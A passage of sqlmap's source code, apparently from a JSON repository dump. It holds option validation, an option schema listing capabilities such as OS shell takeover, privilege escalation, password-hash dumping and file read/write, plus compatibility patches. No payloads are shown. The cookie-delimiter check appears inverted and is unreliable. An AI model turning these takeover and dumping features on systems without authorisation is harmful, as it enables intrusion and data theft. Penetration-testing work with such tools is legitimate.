_http_client.HTTPConnection.putheader\n\n            _http_client.HTTPConnection.putheader = putheader\n\ndef _checkWebSocket():\n    if conf.url and (conf.url.startswith(\"ws:/\") or conf.url.startswith(\"wss:/\")):\n        try:\n            from websocket import ABNF\n        except ImportError:\n            errMsg = \"sqlmap requires third-party module 'websocket-client' \"\n            errMsg += \"in order to use WebSocket functionality\"\n            raise SqlmapMissingDependence(errMsg)\n\ndef _checkTor():\n    if not conf.checkTor:\n        return\n\n    infoMsg = \"checking Tor connection\"\n    logger.info(infoMsg)\n\n    try:\n        page, _, _ = Request.getPage(url=\"https://check.torproject.org/\", raise404=False)\n    except SqlmapConnectionException:\n        page = None\n\n    if not page or \"Congratulations\" not in page:\n        errMsg = \"it appears that Tor is not properly set. Please try using options '--tor-type' and/or '--tor-port'\"\n        raise SqlmapConnectionException(errMsg)\n    else:\n        infoMsg = \"Tor is properly being used\"\n        logger.info(infoMsg)\n\ndef _basicOptionValidation():\n    if conf.limitStart is not None and not (isinstance(conf.limitStart, int) and conf.limitStart > 0):\n        errMsg = \"value for option '--start' (limitStart) must be an integer value greater than zero (>0)\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.limitStop is not None and not (isinstance(conf.limitStop, int) and conf.limitStop > 0):\n        errMsg = \"value for option '--stop' (limitStop) must be an integer value greater than zero (>0)\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.level is not None and not (isinstance(conf.level, int) and conf.level >= 1 and conf.level <= 5):\n        errMsg = \"value for option '--level' must be an integer value from range [1, 5]\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.risk is not None and not (isinstance(conf.risk, int) and conf.risk >= 1 and conf.risk <= 3):\n        errMsg = \"value for option '--risk' must be an integer value from range [1, 3]\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if isinstance(conf.limitStart, int) and conf.limitStart > 0 and \\\n       isinstance(conf.limitStop, int) and conf.limitStop < conf.limitStart:\n        warnMsg = \"usage of option '--start' (limitStart) which is bigger than value for --stop (limitStop) option is considered unstable\"\n        logger.warning(warnMsg)\n\n    if isinstance(conf.firstChar, int) and conf.firstChar > 0 and \\\n       isinstance(conf.lastChar, int) and conf.lastChar < conf.firstChar:\n        errMsg = \"value for option '--first' (firstChar) must be smaller than or equal to value for --last (lastChar) option\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.proxyFile and not any((conf.randomAgent, conf.mobile, conf.agent, conf.requestFile)):\n        warnMsg = \"usage of switch '--random-agent' is strongly recommended when \"\n        warnMsg += \"using option '--proxy-file'\"\n        logger.warning(warnMsg)\n\n    if conf.textOnly and conf.nullConnection:\n        errMsg = \"switch '--text-only' is incompatible with switch '--null-connection'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.base64Parameter and conf.tamper:\n        errMsg = \"option '--base64' is incompatible with option '--tamper'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.eta and conf.verbose > defaults.verbose:\n        errMsg = \"switch '--eta' is incompatible with option '-v'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.secondUrl and conf.secondReq:\n        errMsg = \"option '--second-url' is incompatible with option '--second-req')\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.direct and conf.url:\n        errMsg = \"option '-d' is incompatible with option '-u' ('--url')\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.direct and conf.dbms:\n        errMsg = \"option '-d' is incompatible with option '--dbms'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.titles and conf.nullConnection:\n        errMsg = \"switch '--titles' is incompatible with switch '--null-connection'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.dumpTable and conf.search:\n        errMsg = \"switch '--dump' is incompatible with switch '--search'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.chunked and not any((conf.data, conf.requestFile, conf.forms)):\n        errMsg = \"switch '--chunked' requires usage of (POST) options/switches '--data', '-r' or '--forms'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.api and not conf.configFile:\n        errMsg = \"switch '--api' requires usage of option '-c'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.data and conf.nullConnection:\n        errMsg = \"option '--data' is incompatible with switch '--null-connection'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.string and conf.nullConnection:\n        errMsg = \"option '--string' is incompatible with switch '--null-connection'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.notString and conf.nullConnection:\n        errMsg = \"option '--not-string' is incompatible with switch '--null-connection'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.tor and conf.osPwn:\n        errMsg = \"option '--tor' is incompatible with switch '--os-pwn'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.noCast and conf.hexConvert:\n        errMsg = \"switch '--no-cast' is incompatible with switch '--hex'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.crawlDepth:\n        try:\n            xrange(conf.crawlDepth)\n        except OverflowError as ex:\n            errMsg = \"invalid value used for option '--crawl' ('%s')\" % getSafeExString(ex)\n            raise SqlmapSyntaxException(errMsg)\n\n    if conf.dumpAll and conf.search:\n        errMsg = \"switch '--dump-all' is incompatible with switch '--search'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.string and conf.notString:\n        errMsg = \"option '--string' is incompatible with switch '--not-string'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.regexp and conf.nullConnection:\n        errMsg = \"option '--regexp' is incompatible with switch '--null-connection'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.regexp:\n        try:\n            re.compile(conf.regexp)\n        except Exception as ex:\n            errMsg = \"invalid regular expression '%s' ('%s')\" % (conf.regexp, getSafeExString(ex))\n            raise SqlmapSyntaxException(errMsg)\n\n    if conf.paramExclude:\n        try:\n            re.compile(conf.paramExclude)\n        except Exception as ex:\n            errMsg = \"invalid regular expression '%s' ('%s')\" % (conf.paramExclude, getSafeExString(ex))\n            raise SqlmapSyntaxException(errMsg)\n\n    if conf.retryOn:\n        try:\n            re.compile(conf.retryOn)\n        except Exception as ex:\n            errMsg = \"invalid regular expression '%s' ('%s')\" % (conf.retryOn, getSafeExString(ex))\n            raise SqlmapSyntaxException(errMsg)\n\n        if conf.retries == defaults.retries:\n            conf.retries = 5 * conf.retries\n\n            warnMsg = \"increasing default value for \"\n            warnMsg += \"option '--retries' to %d because \" % conf.retries\n            warnMsg += \"option '--retry-on' was provided\"\n            logger.warning(warnMsg)\n\n\n    if conf.cookieDel and len(conf.cookieDel):\n        errMsg = \"option '--cookie-del' should contain a single character (e.g. ';')\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.crawlExclude:\n        try:\n            re.compile(conf.crawlExclude)\n        except Exception as ex:\n            errMsg = \"invalid regular expression '%s' ('%s')\" % (conf.crawlExclude, getSafeExString(ex))\n            raise SqlmapSyntaxException(errMsg)\n\n    if conf.scope:\n        try:\n            re.compile(conf.scope)\n        except Exception as ex:\n            errMsg = \"invalid regular expression '%s' ('%s')\" % (conf.scope, getSafeExString(ex))\n            raise SqlmapSyntaxException(errMsg)\n\n    if conf.dumpTable and conf.dumpAll:\n        errMsg = \"switch '--dump' is incompatible with switch '--dump-all'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.predictOutput and (conf.threads > 1 or conf.optimize):\n        errMsg = \"switch '--predict-output' is incompatible with option '--threads' and switch '-o'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.threads > MAX_NUMBER_OF_THREADS and not conf.get(\"skipThreadCheck\"):\n        errMsg = \"maximum number of used threads is %d avoiding potential connection issues\" % MAX_NUMBER_OF_THREADS\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.forms and not any((conf.url, conf.googleDork, conf.bulkFile)):\n        errMsg = \"switch '--forms' requires usage of option '-u' ('--url'), '-g' or '-m'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.crawlExclude and not conf.crawlDepth:\n        errMsg = \"option '--crawl-exclude' requires usage of switch '--crawl'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.safePost and not conf.safeUrl:\n        errMsg = \"option '--safe-post' requires usage of option '--safe-url'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.safeFreq and not any((conf.safeUrl, conf.safeReqFile)):\n        errMsg = \"option '--safe-freq' requires usage of option '--safe-url' or '--safe-req'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.safeReqFile and any((conf.safeUrl, conf.safePost)):\n        errMsg = \"option '--safe-req' is incompatible with option '--safe-url' and option '--safe-post'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.csrfUrl and not conf.csrfToken:\n        errMsg = \"option '--csrf-url' requires usage of option '--csrf-token'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.csrfMethod and not conf.csrfToken:\n        errMsg = \"option '--csrf-method' requires usage of option '--csrf-token'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.csrfToken and conf.threads > 1:\n        errMsg = \"option '--csrf-url' is incompatible with option '--threads'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.requestFile and conf.url and conf.url != DUMMY_URL:\n        errMsg = \"option '-r' is incompatible with option '-u' ('--url')\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.direct and conf.proxy:\n        errMsg = \"option '-d' is incompatible with option '--proxy'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.direct and conf.tor:\n        errMsg = \"option '-d' is incompatible with switch '--tor'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if not conf.technique:\n        errMsg = \"option '--technique' can't be empty\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.tor and conf.ignoreProxy:\n        errMsg = \"switch '--tor' is incompatible with switch '--ignore-proxy'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.tor and conf.proxy:\n        errMsg = \"switch '--tor' is incompatible with option '--proxy'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.proxy and conf.proxyFile:\n        errMsg = \"switch '--proxy' is incompatible with option '--proxy-file'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.proxyFreq and not conf.proxyFile:\n        errMsg = \"option '--proxy-freq' requires usage of option '--proxy-file'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.checkTor and not any((conf.tor, conf.proxy)):\n        errMsg = \"switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address of Tor service)\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort >= 0 and conf.torPort <= 65535):\n        errMsg = \"value for option '--tor-port' must be in range [0, 65535]\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.torType not in getPublicTypeMembers(PROXY_TYPE, True):\n        errMsg = \"option '--tor-type' accepts one of following values: %s\" % \", \".join(getPublicTypeMembers(PROXY_TYPE, True))\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.dumpFormat not in getPublicTypeMembers(DUMP_FORMAT, True):\n        errMsg = \"option '--dump-format' accepts one of following values: %s\" % \", \".join(getPublicTypeMembers(DUMP_FORMAT, True))\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.skip and conf.testParameter:\n        if intersect(conf.skip, conf.testParameter):\n            errMsg = \"option '--skip' is incompatible with option '-p'\"\n            raise SqlmapSyntaxException(errMsg)\n\n    if conf.rParam and conf.testParameter:\n        if intersect(conf.rParam, conf.testParameter):\n            errMsg = \"option '--randomize' is incompatible with option '-p'\"\n            raise SqlmapSyntaxException(errMsg)\n\n    if conf.mobile and conf.agent:\n        errMsg = \"switch '--mobile' is incompatible with option '--user-agent'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.proxy and conf.ignoreProxy:\n        errMsg = \"option '--proxy' is incompatible with switch '--ignore-proxy'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.alert and conf.alert.startswith('-'):\n        errMsg = \"value for option '--alert' must be valid operating system command(s)\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.timeSec < 1:\n        errMsg = \"value for option '--time-sec' must be a positive integer\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.uChar and not re.match(UNION_CHAR_REGEX, conf.uChar):\n        errMsg = \"value for option '--union-char' must be an alpha-numeric value (e.g. 1)\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.hashFile and any((conf.direct, conf.url, conf.logFile, conf.bulkFile, conf.googleDork, conf.configFile, conf.requestFile, conf.updateAll, conf.smokeTest, conf.wizard, conf.dependencies, conf.purge, conf.listTampers)):\n        errMsg = \"option '--crack' should be used as a standalone\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if isinstance(conf.uCols, six.string_types):\n        if not conf.uCols.isdigit() and (\"-\" not in conf.uCols or len(conf.uCols.split(\"-\")) != 2):\n            errMsg = \"value for option '--union-cols' must be a range with hyphon \"\n            errMsg += \"(e.g. 1-10) or integer value (e.g. 5)\"\n            raise SqlmapSyntaxException(errMsg)\n\n    if conf.dbmsCred and ':' not in conf.dbmsCred:\n        errMsg = \"value for option '--dbms-cred' must be in \"\n        errMsg += \"format <username>:<password> (e.g. \\\"root:pass\\\")\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if conf.encoding:\n        _ = checkCharEncoding(conf.encoding, False)\n        if _ is None:\n            errMsg = \"unknown encoding '%s'. Please visit \" % conf.encoding\n            errMsg += \"'%s' to get the full list of \" % CODECS_LIST_PAGE\n            errMsg += \"supported encodings\"\n            raise SqlmapSyntaxException(errMsg)\n        else:\n            conf.encoding = _\n\n    if conf.fileWrite and not os.path.isfile(conf.fileWrite):\n        errMsg = \"file '%s' does not exist\" % os.path.abspath(conf.fileWrite)\n        raise SqlmapFilePathException(errMsg)\n\n    if conf.loadCookies and not os.path.exists(conf.loadCookies):\n        errMsg = \"cookies file '%s' does not exist\" % os.path.abspath(conf.loadCookies)\n        raise SqlmapFilePathException(errMsg)\n\ndef initOptions(inputOptions=AttribDict(), overrideOptions=False):\n    _setConfAttributes()\n    _setKnowledgeBaseAttributes()\n    _mergeOptions(inputOptions, overrideOptions)\n\ndef init():\n    \"\"\"\n    Set attributes into both configuration and knowledge base singletons\n    based upon command line and configuration file options.\n    \"\"\"\n\n    _useWizardInterface()\n    setVerbosity()\n    _saveConfig()\n    _setRequestFromFile()\n    _cleanupOptions()\n    _cleanupEnvironment()\n    _purge()\n    _checkDependencies()\n    _createHomeDirectories()\n    _createTemporaryDirectory()\n    _basicOptionValidation()\n    _setProxyList()\n    _setTorProxySettings()\n    _setDNSServer()\n    _adjustLoggingFormatter()\n    _setMultipleTargets()\n    _listTamperingFunctions()\n    _setTamperingFunctions()\n    _setPreprocessFunctions()\n    _setPostprocessFunctions()\n    _setTrafficOutputFP()\n    _setupHTTPCollector()\n    _setHttpChunked()\n    _checkWebSocket()\n\n    parseTargetDirect()\n\n    if any((conf.url, conf.logFile, conf.bulkFile, conf.requestFile, conf.googleDork, conf.stdinPipe)):\n        _setHostname()\n        _setHTTPTimeout()\n        _setHTTPExtraHeaders()\n        _setHTTPCookies()\n        _setHTTPReferer()\n        _setHTTPHost()\n        _setHTTPUserAgent()\n        _setHTTPAuthentication()\n        _setHTTPHandlers()\n        _setDNSCache()\n        _setSocketPreConnect()\n        _setSafeVisit()\n        _doSearch()\n        _setStdinPipeTargets()\n        _setBulkMultipleTargets()\n        _checkTor()\n        _setCrawler()\n        _findPageForms()\n        _setDBMS()\n        _setTechnique()\n\n    _setThreads()\n    _setOS()\n    _setWriteFile()\n    _setMetasploit()\n    _setDBMSAuthentication()\n    loadBoundaries()\n    loadPayloads()\n    _setPrefixSuffix()\n    update()\n    _loadQueries()\n"
  },
  {
    "path": "sqlmap/lib/core/optiondict.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\noptDict = {\n    # Family: {\"parameter name\": \"parameter datatype\"},\n    # --OR--\n    # Family: {\"parameter name\": (\"parameter datatype\", \"category name used for common outputs feature\")},\n\n    \"Target\": {\n        \"direct\": \"string\",\n        \"url\": \"string\",\n        \"logFile\": \"string\",\n        \"bulkFile\": \"string\",\n        \"requestFile\": \"string\",\n        \"sessionFile\": \"string\",\n        \"googleDork\": \"string\",\n        \"configFile\": \"string\",\n    },\n\n    \"Request\": {\n        \"method\": \"string\",\n        \"data\": \"string\",\n        \"paramDel\": \"string\",\n        \"cookie\": \"string\",\n        \"cookieDel\": \"string\",\n        \"liveCookies\": \"string\",\n        \"loadCookies\": \"string\",\n        \"dropSetCookie\": \"boolean\",\n        \"agent\": \"string\",\n        \"mobile\": \"boolean\",\n        \"randomAgent\": \"boolean\",\n        \"host\": \"string\",\n        \"referer\": \"string\",\n        \"headers\": \"string\",\n        \"authType\": \"string\",\n        \"authCred\": \"string\",\n        \"authFile\": \"string\",\n        \"ignoreCode\": \"string\",\n        \"ignoreProxy\": \"boolean\",\n        \"ignoreRedirects\": \"boolean\",\n        \"ignoreTimeouts\": \"boolean\",\n        \"proxy\": \"string\",\n        \"proxyCred\": \"string\",\n        \"proxyFile\": \"string\",\n        \"proxyFreq\": \"integer\",\n        \"tor\": \"boolean\",\n        \"torPort\": \"integer\",\n        \"torType\": \"string\",\n        \"checkTor\": \"boolean\",\n        \"delay\": \"float\",\n        \"timeout\": \"float\",\n        \"retries\": \"integer\",\n        \"retryOn\": \"string\",\n        \"rParam\": \"string\",\n        \"safeUrl\": \"string\",\n        \"safePost\": \"string\",\n        \"safeReqFile\": \"string\",\n        \"safeFreq\": \"integer\",\n        \"skipUrlEncode\": \"boolean\",\n        \"csrfToken\": \"string\",\n        \"csrfUrl\": \"string\",\n        \"csrfMethod\": \"string\",\n        \"csrfRetries\": \"integer\",\n        \"forceSSL\": \"boolean\",\n        \"chunked\": \"boolean\",\n        \"hpp\": \"boolean\",\n        \"evalCode\": \"string\",\n    },\n\n    \"Optimization\": {\n        \"optimize\": \"boolean\",\n        \"predictOutput\": \"boolean\",\n        \"keepAlive\": \"boolean\",\n        \"nullConnection\": \"boolean\",\n        \"threads\": \"integer\",\n    },\n\n    \"Injection\": {\n        \"testParameter\": \"string\",\n        \"skip\": \"string\",\n        \"skipStatic\": \"boolean\",\n        \"paramExclude\": \"string\",\n        \"paramFilter\": \"string\",\n        \"dbms\": \"string\",\n        \"dbmsCred\": \"string\",\n        \"os\": \"string\",\n        \"invalidBignum\": \"boolean\",\n        \"invalidLogical\": \"boolean\",\n        \"invalidString\": \"boolean\",\n        \"noCast\": \"boolean\",\n        \"noEscape\": \"boolean\",\n        \"prefix\": \"string\",\n        \"suffix\": \"string\",\n        \"tamper\": \"string\",\n    },\n\n    \"Detection\": {\n        \"level\": \"integer\",\n        \"risk\": \"integer\",\n        \"string\": \"string\",\n        \"notString\": \"string\",\n        \"regexp\": \"string\",\n        \"code\": \"integer\",\n        \"smart\": \"boolean\",\n        \"textOnly\": \"boolean\",\n        \"titles\": \"boolean\",\n    },\n\n    \"Techniques\": {\n        \"technique\": \"string\",\n        \"timeSec\": \"integer\",\n        \"uCols\": \"string\",\n        \"uChar\": \"string\",\n        \"uFrom\": \"string\",\n        \"dnsDomain\": \"string\",\n        \"secondUrl\": \"string\",\n        \"secondReq\": \"string\",\n    },\n\n    \"Fingerprint\": {\n        \"extensiveFp\": \"boolean\",\n    },\n\n    \"Enumeration\": {\n        \"getAll\": \"boolean\",\n        \"getBanner\": (\"boolean\", \"Banners\"),\n        \"getCurrentUser\": (\"boolean\", \"Users\"),\n        \"getCurrentDb\": (\"boolean\", \"Databases\"),\n        \"getHostname\": \"boolean\",\n        \"isDba\": \"boolean\",\n        \"getUsers\": (\"boolean\", \"Users\"),\n        \"getPasswordHashes\": (\"boolean\", \"Passwords\"),\n        \"getPrivileges\": (\"boolean\", \"Privileges\"),\n        \"getRoles\": (\"boolean\", \"Roles\"),\n        \"getDbs\": (\"boolean\", \"Databases\"),\n        \"getTables\": (\"boolean\", \"Tables\"),\n        \"getColumns\": (\"boolean\", \"Columns\"),\n        \"getSchema\": \"boolean\",\n        \"getCount\": \"boolean\",\n        \"dumpTable\": \"boolean\",\n        \"dumpAll\": \"boolean\",\n        \"search\": \"boolean\",\n        \"getComments\": \"boolean\",\n        \"getStatements\": \"boolean\",\n        \"db\": \"string\",\n        \"tbl\": \"string\",\n        \"col\": \"string\",\n        \"exclude\": \"string\",\n        \"pivotColumn\": \"string\",\n        \"dumpWhere\": \"string\",\n        \"user\": \"string\",\n        \"excludeSysDbs\": \"boolean\",\n        \"limitStart\": \"integer\",\n        \"limitStop\": \"integer\",\n        \"firstChar\": \"integer\",\n        \"lastChar\": \"integer\",\n        \"sqlQuery\": \"string\",\n        \"sqlShell\": \"boolean\",\n        \"sqlFile\": \"string\",\n    },\n\n    \"Brute\": {\n        \"commonTables\": \"boolean\",\n        \"commonColumns\": \"boolean\",\n        \"commonFiles\": \"boolean\",\n    },\n\n    \"User-defined function\": {\n        \"udfInject\": \"boolean\",\n        \"shLib\": \"string\",\n    },\n\n    \"File system\": {\n        \"fileRead\": \"string\",\n        \"fileWrite\": \"string\",\n        \"fileDest\": \"string\",\n    },\n\n    \"Takeover\": {\n        \"osCmd\": \"string\",\n        \"osShell\": \"boolean\",\n        \"osPwn\": \"boolean\",\n        \"osSmb\": \"boolean\",\n        \"osBof\": \"boolean\",\n        \"privEsc\": \"boolean\",\n        \"msfPath\": \"string\",\n        \"tmpPath\": \"string\",\n    },\n\n    \"Windows\": {\n        \"regRead\": \"boolean\",\n        \"regAdd\": \"boolean\",\n        \"regDel\": \"boolean\",\n        \"regKey\": \"string\",\n        \"regVal\": \"string\",\n        \"regData\": \"string\",\n        \"regType\": \"string\",\n    },\n\n    \"General\": {\n        \"trafficFile\": \"string\",\n        \"answers\": \"string\",\n        \"batch\": \"boolean\",\n        \"base64Parameter\": \"string\",\n        \"base64Safe\": \"boolean\",\n        \"binaryFields\": \"string\",\n        \"charset\": \"string\",\n        \"checkInternet\": \"boolean\",\n        \"cleanup\": \"boolean\",\n        \"crawlDepth\": \"integer\",\n        \"crawlExclude\": \"string\",\n        \"csvDel\": \"string\",\n        \"dumpFormat\": \"string\",\n        \"encoding\": \"string\",\n        \"eta\": \"boolean\",\n        \"flushSession\": \"boolean\",\n        \"forms\": \"boolean\",\n        \"freshQueries\": \"boolean\",\n        \"googlePage\": \"integer\",\n        \"harFile\": \"string\",\n        \"hexConvert\": \"boolean\",\n        \"outputDir\": \"string\",\n        \"parseErrors\": \"boolean\",\n        \"postprocess\": \"string\",\n        \"preprocess\": \"string\",\n        \"repair\": \"boolean\",\n        \"saveConfig\": \"string\",\n        \"scope\": \"string\",\n        \"skipHeuristics\": \"boolean\",\n        \"skipWaf\": \"boolean\",\n        \"testFilter\": \"string\",\n        \"testSkip\": \"string\",\n        \"webRoot\": \"string\",\n    },\n\n    \"Miscellaneous\": {\n        \"alert\": \"string\",\n        \"beep\": \"boolean\",\n        \"dependencies\": \"boolean\",\n        \"disableColoring\": \"boolean\",\n        \"listTampers\": \"boolean\",\n        \"noLogging\": \"boolean\",\n        \"offline\": \"boolean\",\n        \"purge\": \"boolean\",\n        \"resultsFile\": \"string\",\n        \"tmpDir\": \"string\",\n        \"unstable\": \"boolean\",\n        \"updateAll\": \"boolean\",\n        \"wizard\": \"boolean\",\n        \"verbose\": \"integer\",\n    },\n\n    \"Hidden\": {\n        \"dummy\": \"boolean\",\n        \"disablePrecon\": \"boolean\",\n        \"profile\": \"boolean\",\n        \"forceDns\": \"boolean\",\n        \"murphyRate\": \"integer\",\n        \"smokeTest\": \"boolean\",\n    },\n\n    \"API\": {\n        \"api\": \"boolean\",\n        \"taskid\": \"string\",\n        \"database\": \"string\",\n    }\n}\n"
  },
  {
    "path": "sqlmap/lib/core/patch.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport codecs\nimport os\nimport random\nimport re\nimport sys\n\nimport lib.controller.checks\nimport lib.core.common\nimport lib.core.convert\nimport lib.core.option\nimport lib.core.threads\nimport lib.request.connect\nimport lib.utils.search\nimport lib.utils.sqlalchemy\nimport thirdparty.ansistrm.ansistrm\nimport thirdparty.chardet.universaldetector\n\nfrom lib.core.common import filterNone\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import isDigit\nfrom lib.core.common import isListLike\nfrom lib.core.common import readInput\nfrom lib.core.common import shellExec\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.compat import xrange\nfrom lib.core.convert import stdoutEncode\nfrom lib.core.data import conf\nfrom lib.core.enums import PLACE\nfrom lib.core.option import _setHTTPHandlers\nfrom lib.core.option import setVerbosity\nfrom lib.core.settings import IS_WIN\nfrom lib.request.templates import getPageTemplate\nfrom thirdparty import six\nfrom thirdparty.six.moves import http_client as _http_client\n\n_rand = 0\n\ndef dirtyPatches():\n    \"\"\"\n    Place for \"dirty\" Python related patches\n    \"\"\"\n\n    # accept overly long result lines (e.g. SQLi results in HTTP header responses)\n    _http_client._MAXLINE = 1 * 1024 * 1024\n\n    # prevent double chunked encoding in case of sqlmap chunking (Note: Python3 does it automatically if 'Content-length' is missing)\n    if six.PY3:\n        if not hasattr(_http_client.HTTPConnection, \"__send_output\"):\n            _http_client.HTTPConnection.__send_output = _http_client.HTTPConnection._send_output\n\n        def _send_output(self, *args, **kwargs):\n            if conf.get(\"chunked\") and \"encode_chunked\" in kwargs:\n                kwargs[\"encode_chunked\"] = False\n            self.__send_output(*args, **kwargs)\n\n        _http_client.HTTPConnection._send_output = _send_output\n\n    # add support for inet_pton() on Windows OS\n    if IS_WIN:\n        from thirdparty.wininetpton import win_inet_pton\n\n    # Reference: https://github.com/nodejs/node/issues/12786#issuecomment-298652440\n    codecs.register(lambda name: codecs.lookup(\"utf-8\") if name == \"cp65001\" else None)\n\n    # Reference: http://bugs.python.org/issue17849\n    if hasattr(_http_client, \"LineAndFileWrapper\"):\n        def _(self, *args):\n            return self._readline()\n\n        _http_client.LineAndFileWrapper._readline = _http_client.LineAndFileWrapper.readline\n        _http_client.LineAndFileWrapper.readline = _\n\n    # to prevent too much \"guessing\" in case of binary data retrieval\n    thirdparty.chardet.universaldetector.MINIMUM_THRESHOLD = 0.90\n\n    match = re.search(r\" --method[= ](\\w+)\", \" \".join(sys.argv))\n    if match and match.group(1).upper() != PLACE.POST:\n        PLACE.CUSTOM_POST = PLACE.CUSTOM_POST.replace(\"POST\", \"%s (body)\" % match.group(1))\n\n    # https://github.com/sqlmapproject/sqlmap/issues/4314\n    try:\n        os.urandom(1)\n    except NotImplementedError:\n        if six.PY3:\n            os.urandom = lambda size: bytes(random.randint(0, 255) for _ in range(size))\n        else:\n            os.urandom = lambda size: \"\".join(chr(random.randint(0, 255)) for _ in xrange(size))\n\ndef resolveCrossReferences():\n    \"\"\"\n    Place for cross-reference resolution\n    \"\"\"\n\n    lib.core.threads.isDigit = isDigit\n    lib.core.threads.readInput = readInput\n    lib.core.common.getPageTemplate = getPageTemplate\n    lib.core.convert.filterNone = filterNone\n    lib.core.convert.isListLike = isListLike\n    lib.core.convert.shellExec = shellExec\n    lib.core.convert.singleTimeWarnMessage = singleTimeWarnMessage\n    lib.core.option._pympTempLeakPatch = pympTempLeakPatch\n    lib.request.connect.setHTTPHandlers = _setHTTPHandlers\n    lib.utils.search.setHTTPHandlers = _setHTTPHandlers\n    lib.controller.checks.setVerbosity = setVerbosity\n    lib.utils.sqlalchemy.getSafeExString = getSafeExString\n    thirdparty.ansistrm.ansistrm.stdoutEncode = stdoutEncode\n\ndef pympTempLeakPatch(tempDir):\n    \"\"\"\n    Patch for \"pymp\" leaking directories inside Python3\n    \"\"\"\n\n    try:\n        import multiprocessing.util\n        multiprocessing.util.get_temp_dir = lambda: tempDir\n    except:\n        pass\n\ndef unisonRandom():\n    \"\"\"\n    Unifying random generated data across different Python versions\n    \"\"\"\n\n    def _lcg():\n        global _rand\n        a = 1140671485\n        c = 128201163\n        m = 2 ** 24\n        _rand = (a * _rand + c) % m\n        return _rand\n\n    def _randint(a, b):\n        _ = a + (_lcg() % (b - a + 1))\n        return _\n\n    def _choice(seq):\n        return seq[_randint(0, len(seq) - 1)]\n\n    def _sample(population, k):\n        return [_choice(population) for _ in xrange(k)]\n\n    def _seed(seed):\n        global _rand\n        _rand = seed\n\n    random.choice = _choice\n    random.randint = _randint\n    random.sample = _sample\n    random.seed = _seed\n"
  },
  {
    "path": "sqlmap/lib/core/profiling.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport cProfile\nimport os\n\nfrom lib.core.data import logger\nfrom lib.core.data import paths\n\ndef profile(profileOutputFile=None):\n    \"\"\"\n    This will run the program and present profiling data in a nice looking graph\n    \"\"\"\n\n    if profileOutputFile is None:\n        profileOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, \"sqlmap_profile.raw\")\n\n    if os.path.exists(profileOutputFile):\n        os.remove(profileOutputFile)\n\n    # Start sqlmap main function and generate a raw profile file\n    cProfile.run(\"start()\", profileOutputFile)\n\n    infoMsg = \"execution profiled and stored into file '%s' (e.g. 'gprof2dot -f pstats %s | dot -Tpng -o /tmp/sqlmap_profile.png')\" % (profileOutputFile, profileOutputFile)\n    logger.info(infoMsg)\n"
  },
  {
    "path": "sqlmap/lib/core/readlineng.py",
